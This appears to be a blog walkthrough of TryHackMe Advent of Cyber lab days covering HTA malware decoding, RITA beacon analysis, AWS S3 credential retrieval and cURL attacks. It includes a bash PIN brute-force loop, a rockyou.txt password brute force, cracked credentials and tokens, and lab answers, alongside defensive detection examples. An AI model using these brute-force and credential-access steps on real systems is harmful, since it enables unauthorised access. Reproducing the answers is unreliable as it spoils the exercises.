Day 21: Malware Analysis: HTA apps
Room Link
You can use the AttackBox or just download the 'malicious' file. Do not run it. Open your text editor and open the file (drag and drop it, or Ctrl+O).
Task 2 questions are relatively easy. This is a hard one:
The HTA is enumerating information from the local host executing the application. What two pieces of information about the computer it is running on are being exfiltrated? You should provide the two object names separated by commas.
=> You can find it inside the provideFeedbackvba function! Just Ctrl+F to find this string in the HTA file.
Next question: What endpoint is the enumerated data being exfiltrated to?
Meaning: the malware collects that information and sends it where? The answer is two lines below the line from the last question.
What HTTP method is being used to exfiltrate the data?
=> GET, a three-letter word.
What is the line of code that executes the contents of the download?
=> The line that starts with 'runObject.Run'
What popular encoding scheme was used in an attempt to obfuscate the download?
=> MD5 and Base64 are both popular names, but only Base64 is an encoding scheme.
Decode the payload. It seems as if additional steps were taken to hide the malware! What common encryption scheme was used in the script?
=> Can't say Base64 this time. From the script it is apparent that letters were shifted: ROT13 is the answer.
=> Because ROT13 is cyclic (a shift of 13 over a 26-letter alphabet), the same ROT13 operation that encoded the string also decodes it.
Now the most important question: it's the optional one!
For those who want another challenge, download the HTA file from here to get the key for Side Quest 4, accessible through our Side Quest Hub. The password for the file is CanYouREM3?.
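An added Python example (not code from the room or from the HTA itself) of the two-layer decode described above: pull Base64-looking string literals out of a script, Base64-decode them, then apply ROT13. The HTA snippet, the variable name downloaded and the blob are all constructed; the blob decodes to the harmless text 'hello world'.

```python
import base64
import codecs
import re

# Constructed stand-in for the interesting lines of the HTA; not the real file.
HTA_SNIPPET = '''
Set runObject = CreateObject("WScript.Shell")
downloaded = "dXJ5eWIgamJleXE="
'''

# Long, alphabet-only, optionally padded string literals are Base64 candidates.
B64_RE = re.compile(r'"([A-Za-z0-9+/]{12,}={0,2})"')

def rot13(text: str) -> str:
    """ROT13 is its own inverse; non-letters pass through unchanged."""
    return codecs.encode(text, "rot_13")

def obfuscate(command: str) -> str:
    """Model of the two layers seen in the HTA: ROT13 first, then Base64."""
    return base64.b64encode(rot13(command).encode()).decode()

def deobfuscate(blob: str) -> str:
    """Undo the layers in reverse order: Base64-decode, then ROT13 again."""
    return rot13(base64.b64decode(blob, validate=True).decode())

def find_blobs(script_text: str) -> list:
    """Quoted strings that look like Base64 (valid alphabet, length % 4 == 0)."""
    return [s for s in B64_RE.findall(script_text) if len(s) % 4 == 0]

def decode_script(script_text: str) -> dict:
    """Map each Base64-looking literal in the script to its decoded content."""
    return {blob: deobfuscate(blob) for blob in find_blobs(script_text)}
```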
Day 22: C2 = Command & Control
Room Link
Just like attackers have a wide range of tools in their arsenal, defenders also have many tools, frameworks, end-to-end solutions etc.
Throughout Advent of Cyber, we have been acquainted with Splunk, Burp Suite Community Edition, the DevTools!, YARA and now RITA (Real Intelligence Threat Analytics).
Note: You are supposed to see a GUI; if not, click this:

RITA works on Zeek logs rather than raw captures. Network activity is usually recorded as a pcap file, so for today's use case we first convert the PCAP to Zeek logs:
zeek readpcap pcaps/AsyncRAT.pcap zeek_logs/asyncrat
The command follows the format zeek readpcap inputFile outputDir.
Then import the logs with RITA:
rita import --logs ~/zeek_logs/asyncrat/ --database asyncrat
This analyses the logs and creates a new database we named 'asyncrat'. Now we can browse this 'result database' with rita view asyncrat
Note that you should open the VM in a new tab to see the rita view asyncrat output properly. There is an expand icon in the lower bar.
To answer the questions we need to analyze a different file rita_challenge.pcap.
- How many hosts are communicating with malhare.net? => Count the lines in 'rita view databasename'.
- Which Threat Modifier tells us the number of hosts communicating to a certain destination? => Scroll up to the 'Threat Modifier' section of the room text.
- Highest number of connections to rabbithole.malhare.net?
=> Use the arrow keys and find the max "Connection Count".
- Which search filter would you use to search for all entries that communicate to rabbithole.malhare.net with a beacon score greater than 70% and sorted by connection duration (descending)?
=> Refresh your memory by reading the Search bar section of the THM room again.
- communicate to rabbithole.malhare.net: dst:rabbithole.malhare.net
- beacon score equal to or greater than 70%: beacon:>=70
- sorted by connection duration (descending): sort:duration-desc
Don't type in the VM, I find it slow. Type the entire thing here and paste it into the VM's RITA search bar.
- Which port did the host 10.0.0.13 use to connect to rabbithole.malhare.net?
=> Bro, just use the arrow keys and read the panel on the right.
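An added example (not part of the room and not RITA's own code) of the kind of aggregation RITA performs over Zeek conn.log, in Python over a constructed, simplified conn.log subset (only ts, id.orig_h, id.resp_h and duration; documentation IP ranges instead of hostnames). It counts hosts per destination and connections per pair, computes a crude interval-regularity score that stands in for RITA's beacon score, and has a search() that mirrors the dst/beacon/sort filter from the question.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed, simplified conn.log subset: only ts, id.orig_h, id.resp_h and duration.
# Addresses are documentation ranges; nothing here comes from the room's pcap.
CONN_LOG = """\
#fields ts id.orig_h id.resp_h duration
1700000000.0 10.0.0.13 203.0.113.10 0.5
1700000060.0 10.0.0.13 203.0.113.10 0.25
1700000120.0 10.0.0.13 203.0.113.10 0.75
1700000180.0 10.0.0.13 203.0.113.10 0.5
1700000005.0 10.0.0.22 203.0.113.10 0.25
1700000900.0 10.0.0.22 203.0.113.10 0.5
1700000050.0 10.0.0.22 198.51.100.7 3.0
"""

def parse_conn(text):
    """Skip '#' header lines and return one dict per connection."""
    rows = []
    for line in text.splitlines():
        if line and not line.startswith("#"):
            ts, src, dst, dur = line.split()
            rows.append({"ts": float(ts), "src": src, "dst": dst, "duration": float(dur)})
    return rows

def regularity(timestamps):
    """Crude beacon indicator (not RITA's algorithm): 100 when every gap between
    connections is identical, dropping toward 0 as the gaps become irregular."""
    ts = sorted(timestamps)
    if len(ts) < 3:
        return 0.0
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    return round(100 * max(0.0, 1 - pstdev(gaps) / mean(gaps)), 1)

def summarize(records):
    """One row per (src, dst): connection count, total duration, beacon score."""
    groups = defaultdict(list)
    for r in records:
        groups[(r["src"], r["dst"])].append(r)
    return [{"src": s, "dst": d, "count": len(rs),
             "duration": sum(r["duration"] for r in rs),
             "beacon": regularity([r["ts"] for r in rs])} for (s, d), rs in groups.items()]

def hosts_talking_to(summary, dst):
    return sorted({row["src"] for row in summary if row["dst"] == dst})

def search(summary, dst, min_beacon=0, sort_key="duration", desc=True):
    """Python twin of the RITA filter 'dst:<host> beacon:>=<n> sort:duration-desc'."""
    rows = [r for r in summary if r["dst"] == dst and r["beacon"] >= min_beacon]
    return sorted(rows, key=lambda r: r[sort_key], reverse=desc)
```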
Day 23: AWS Security
Room Link
If you have never worked with AWS, no worries; just read through the very friendly THM literature.
Basically, AWS lets us control our infrastructure resources programmatically via access keys, much like "API keys". We authenticate through environment variables that hold these keys, and the identity behind them is what grants the necessary permissions.
Another very useful tool is the AWS CLI, which lets you run AWS commands directly from your terminal to provision and manage your infrastructure. For example: aws ec2 run-instances provisions (creates) a VM (an EC2 instance); aws sts get-caller-identity displays details about the IAM identity you are using.
Don't make my mistake in Task 1! Actually run the command in the Target Machine VM:
Task 4 Question: Apart from GetObject and ListBucket, what other action can be taken by assuming the bucketmaster role?
=> Note that you have to assume the bucketmaster role from the previous task. Make sure to follow all the steps, including exporting the new access keys.
That lists the bucket and its objects.
To view the specific object (file) cloud_password.txt you also have to pass it as the 'key' argument:
See the example in the AWS docs.
aws s3api get-object --key cloud_password.txt --bucket easter-secrets-123145
This command is still incomplete: we also have to give an output 'filename', because this is basically a download operation, i.e. aws s3api get-object --bucket easter-secrets-123145 --key cloud_password.txt cpass.txt
I tried typing just '-' to print it to standard output rather than saving it to disk, but it didn't work. It showed the metadata instead:

cpass.txt is the downloaded 'cloud_password.txt' file:

Day 24: Exploitation with cURL
Room Link
A little bit of legendary history hurts nobody:

cURL is basically a command-line tool for talking to other machines by sending HTTP requests (and it speaks many other protocols too).
Task 2 Questions:
- Make a POST request to the /post.php endpoint with the username admin and the password admin. What is the flag you receive?
=> You will not get through if you try to be clever and set a User-Agent header, because the task wants you to use the terminal without setting any User-Agent header.
- Make a request to the /cookie.php endpoint with the username admin and the password admin and save the cookie. Reuse that saved cookie at the same endpoint. What is the flag you receive?
=> First log in and save the cookie:
curl -c cookie.txt -X POST -d "username=admin&password=admin" http://10.49.172.12/cookie.php
Then simply send an empty GET with the saved cookie:
curl -b cookie.txt http://10.49.172.12/cookie.php
Just follow the THM steps.
- Make a request to the /agent.php endpoint with the user-agent TBFC. What is the flag you receive?
=>
curl -A "TBFC" -s http://10.49.172.12/agent.php
Bonus Question:
We need to "identify endpoints, authenticate and obtain the operator token, and call the close operation."
curl -A "secretcomputer" "http://10.49.172.12/terminal.php?action=panel"
Note that our final goal is to 'close the portal'.

But we need three things: a session, the operator token and the X-Force header.
Step 1: brute force the /login endpoint
You can use the old script from the THM room, or even ask GPT to make you a script that uses all the CPU cores!
Running the script with rockyou.txt
If you are not in the AttackBox, download it from here and extract the text file with gunzip rockyou.txt.gz
Go outside and touch grass.
Step 2: Guess the PIN
Notice the /pin endpoint that gives us a temporary admin token. THM says the PIN is between 4000 and 5000.
It's important to know that exploring and tinkering are the number one steps to breaking into anything. Expecting a linear, step-by-step approach is a mistake.
If we 'fool around' we get a hint on how to submit a PIN value, compared to the "username=admin&password=admin" approach:
```bash
for pass in $(seq 5000 -1 4000); do
  # echo "Trying PIN: $pass"
  resp=$(curl -sA "secretcomputer" -X POST -d "pin=$pass" "http://10.48.172.152/terminal.php?action=pin")
  if ! grep -q "fail" <<< "$resp"; then echo "$pass is the pin"; echo "$resp"; break; fi
  # echo "$resp"
done
```
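What Step 1 and Step 2 look like from the server side, as an added example that is not part of the THM room or the original post: a small Python detector over constructed access-log lines (the IPs, timestamps and requests are made up) that flags any source sending many POSTs to the same terminal.php action inside a short window, regardless of status code.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (combined format); the IPs, times and requests are made up.
ACCESS_LOG = """\
10.0.0.5 - - [24/Dec/2025:10:00:01 +0000] "POST /terminal.php?action=login HTTP/1.1" 401 48 "-" "secretcomputer"
10.0.0.5 - - [24/Dec/2025:10:00:02 +0000] "POST /terminal.php?action=login HTTP/1.1" 401 48 "-" "secretcomputer"
10.0.0.5 - - [24/Dec/2025:10:00:02 +0000] "POST /terminal.php?action=login HTTP/1.1" 401 48 "-" "secretcomputer"
10.0.0.5 - - [24/Dec/2025:10:00:03 +0000] "POST /terminal.php?action=login HTTP/1.1" 401 48 "-" "secretcomputer"
10.0.0.5 - - [24/Dec/2025:10:00:03 +0000] "POST /terminal.php?action=login HTTP/1.1" 401 48 "-" "secretcomputer"
10.0.0.9 - - [24/Dec/2025:10:00:04 +0000] "POST /terminal.php?action=pin HTTP/1.1" 200 31 "-" "secretcomputer"
10.0.0.9 - - [24/Dec/2025:10:00:05 +0000] "POST /terminal.php?action=pin HTTP/1.1" 200 31 "-" "secretcomputer"
10.0.0.9 - - [24/Dec/2025:10:02:05 +0000] "POST /terminal.php?action=pin HTTP/1.1" 200 31 "-" "secretcomputer"
10.0.0.7 - - [24/Dec/2025:10:00:06 +0000] "GET /terminal.php?action=panel HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+) [^"]*" (\d{3})')

def parse(line):
    """Return (ip, time, method, action) for one combined-format line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, _status = m.groups()
    action = parse_qs(urlsplit(path).query).get("action", [""])[0]
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, action

def find_bursts(log_text, threshold=5, window_s=60):
    """{(ip, action): max POSTs inside any window_s-second window} for pairs reaching
    threshold. Status codes are ignored on purpose: /pin answers 200 to wrong guesses."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse(line)
        if rec and rec[2] == "POST":
            events[(rec[0], rec[3])].append(rec[1])
    flagged, window = {}, timedelta(seconds=window_s)
    for key, times in events.items():
        times.sort()
        best = j = 0
        for i, t in enumerate(times):
            while times[j] < t - window:  # slide the window's left edge forward
                j += 1
            best = max(best, i - j + 1)
        if best >= threshold:
            flagged[key] = best
    return flagged
```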

Note the type of user: operator. Does this mean we should brute force the login endpoint with username=operator? I'm writing this early, by the way; step 1 is taking too much time, there are 14,344,391 different passwords to try!
Remember what happens when we try the close endpoint? We require three things: admin session, operator token, and X-Force header.
The brute force is taking so much time that I have to look into a solution video. The dude uses a tool called ffuf on a partial rockyou.txt. After an hour the script is at the 121,000th password. The correct password "stellaris61" is at line 3,537,735!
We will save the session on our machine with the -c flag.
curl -A "secretcomputer" "http://10.48.172.152/terminal.php?action=login" -X POST -d "username=admin&password=stellaris61" -c session.txt
Now we can hit the /close endpoint with our 'admin session' and our 'operator token'! We still need to figure out the custom X-Force header; let's try the value 'true':
curl -A "secretcomputer" "http://10.48.172.152/terminal.php?action=close" -X POST -d "username=admin&password=stellaris61&operator_token=7dce601fc5cf86aae78f1471e5af3220956de91cefd714e2ff399da426a79ced" -b session.txt -H "X-Force: true"
There is a mistake in how we used our operator_token. The following is the accurate way.
The reason I use the status endpoint is that the close endpoint is not very friendly about which specific value is actually invalid.

The X-Force value is not obvious at first, but TryHackMe mentions it; kudos to that YouTube channel.
And finally, the reason for the meme:
Entries for the Giveaway can be submitted from December 1st 2025 to December 31st 2025, by completing rooms.
Onwards and upwards...